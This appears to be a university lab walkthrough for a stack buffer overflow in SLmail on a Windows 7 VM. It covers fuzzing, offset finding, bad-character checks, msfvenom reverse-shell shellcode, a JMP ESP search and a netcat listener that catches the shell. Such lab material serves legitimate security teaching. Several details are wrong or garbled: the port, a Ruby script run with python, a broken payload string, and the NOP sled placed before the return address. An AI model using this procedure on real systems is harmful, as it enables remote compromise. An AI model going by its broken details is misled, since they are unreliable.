1. **Prepare Parrot OS and Windows 7 VM:** - Start your UTM instance with both Parrot OS (NAT mode) and Windows 7 VMs active. - Switch Parrot OS to "Host-only network" mode and note down its IP address. - Ensure you can ping Windows 7 VM from Parrot OS. 2. **Download required files:** - Download the "Scripts.zip" file from Blackboard (T2, Week 2) on your Parrot OS. - Extract the contents of "Scripts.zip" to a convenient location, e.g., `/opt/exploit-dev/scripts/`. 3. **Run SLmail and Immunity Debugger (ID):** - Start SLmail on Windows 7 VM. - Run Immunity Debugger as an administrator. To make the font more legible, right-click on the black area > appearance > font > OEM. 4. **Attach SLmail to ID:** - In Immunity Debugger, go to `File > Attach…`, select the SLmail process, and click 'Open'. - Set the debugger to "Running" state by clicking on the "Running" button in the toolbar. 5. **Run the fuzzer:** - Open a terminal on Parrot OS and navigate to the scripts directory. - Run `python fuzzer.py 49500` (SLmail's default port is 49500) to start fuzzing the application. - The goal is to Crash SLmail by sending random data. 6. **Generate unique 4-byte patterns:** - Run `ruby pattern_create.rb ` (e.g., `ruby pattern_create.rb 100`) to generate a unique 4-byte pattern that will help in identifying the crash location. 7. **Find the starting offset:** - Send the generated pattern to SLmail using the fuzzer and observe where it crashes. The offset is the number of bytes before the crash location. - Use `python pattern_offset.rb ` to calculate and confirm the offset. 8. **Verify the offset:** - Send a crafted payload with the correct EIP overwritten to ensure that our previous steps were accurate. - Use `python sendshell.py 49500 "" "stupid string"` to send the crafted payload. 9. **Check for space in the stack:** - Send approximately 800 bytes after the EIP location to verify there's enough space for our payload. - Use `ruby space.rb 800` to check the available space. 10. **Find bad characters:** - Identify byte values that cause the application to behave unexpectedly (e.g., crash or exhibit unexpected behavior). - Use `ruby badchars.rb 49500 ` to find and list bad characters. 11. **Create shellcode:** - Use msfvenom to create a payload (shellcode) with the appropriate architecture and privileges, excluding the bad characters identified earlier. - Run `msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -a x86 --bad-chars= -f raw` to generate the shellcode. 12. **Identify DLL without memory protections:** - Use `!mona modules` in Immunity Debugger to identify DLLs without memory protections. - Our target is `slmfc.dll`. 13. **Find JMP ESP address:** - Use nasm_shell to get opcodes for JMP ESP (FF E4). - Run `nasm_shell> ff e4` to get the opcodes. - Use `!mona find -s "\xff\xe4" -m slmfc.dll` to search for the FF E4 opcode in slmfc.dll and choose an address (e.g., `0x5f4a358f`) as the new EIP. 14. **Prepare exploit script:** - Replace `Bs` in the exploit script (e.g., `exploit.rb`) with the address chosen earlier. - Add a NOP sled (e.g., `\x90` *16*) before the JMP ESP address to account for any slight miscalculations or fluctuations in memory layout. - The exploit script should look something like this: `"\x90" * 16 + "\xff\x\xe4" + "\xbe\xxx\xxxx\xxx\xxx"`. Replace `Bs` with the chosen address. 15. **Start netcat listener:** - On Parrot OS, run `nc -lvp 443` to start a netcat listener on port 443. 16. **Run exploit:** - Execute the prepared exploit script with `ruby exploit.rb 49500`. - Once the exploit triggers, you should get a shell on the Windows 7 VM.